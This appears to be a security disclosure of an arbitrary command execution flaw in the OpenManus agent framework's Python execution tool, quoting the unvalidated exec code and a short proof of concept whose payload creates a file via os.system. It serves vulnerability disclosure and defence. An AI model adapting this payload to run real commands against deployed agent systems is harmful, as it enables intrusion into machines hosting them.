# Arbitrary Command Execution in OpenManus(GitHub)
## Basic information
Author: Chuanhao Wan(wanchuanhao@hust.edu.cn)

Vulnerable library: OpenManus

Library url: https://github.com/mannaandpoem/OpenManus

Language: Python

Affected version: <=0.3.0

Vulnerable module: app/tool/python_execute.py

The vulnerable functions(line 25-37, 39-75) in the vulnerable module is:
```python
def _run_code(self, code: str, result_dict: dict, safe_globals: dict) -> None:
    original_stdout = sys.stdout
    try:
        output_buffer = StringIO()
        sys.stdout = output_buffer
        exec(code, safe_globals, safe_globals)
        result_dict["observation"] = output_buffer.getvalue()
        result_dict["success"] = True
    except Exception as e:
        result_dict["observation"] = str(e)
        result_dict["success"] = False
    finally:
        sys.stdout = original_stdout
```
```python
async def execute(
    self,
    code: str,
    timeout: int = 5,
) -> Dict:
    """
    Executes the provided Python code with a timeout.

    Args:
        code (str): The Python code to execute.
        timeout (int): Execution timeout in seconds.

    Returns:
        Dict: Contains 'output' with execution output or error message and 'success' status.
    """

    with multiprocessing.Manager() as manager:
        result = manager.dict({"observation": "", "success": False})
        if isinstance(__builtins__, dict):
            safe_globals = {"__builtins__": __builtins__}
        else:
            safe_globals = {"__builtins__": __builtins__.__dict__.copy()}
        proc = multiprocessing.Process(
            target=self._run_code, args=(code, result, safe_globals)
        )
        proc.start()
        proc.join(timeout)

        # timeout process
        if proc.is_alive():
            proc.terminate()
            proc.join(1)
            return {
                "observation": f"Execution timeout after {timeout} seconds",
                "success": False,
            }
        return dict(result)
```
Arbitrary Command Execution vulnerability can be triggered in ```execute``` and ```_run_code``` functions, because the argument  ```code``` is not checked and validated before being executed.

## Exploit
Environment prepare: Linux, python version 3.12. Install required libraries:
```python
pip3 install git+ https://github.com/mannaandpoem/OpenManus.git@v0.3.0
pip3 install boto3
pip3 install baidusearch
pip3 install duckduckgo-search
pip3 install docker
```

The PoC code:
```python
from app.tool.python_execute import PythonExecute
import asyncio

pe = PythonExecute()

payload = "import os; os.system('touch hack.txt')"
asyncio.run(pe.execute(code=payload))
```
Run this PoC, the ```payload``` will be executed and create a ```hack.txt``` file in work folder.
Almost all commands can be encapsulated within the payload for execution.
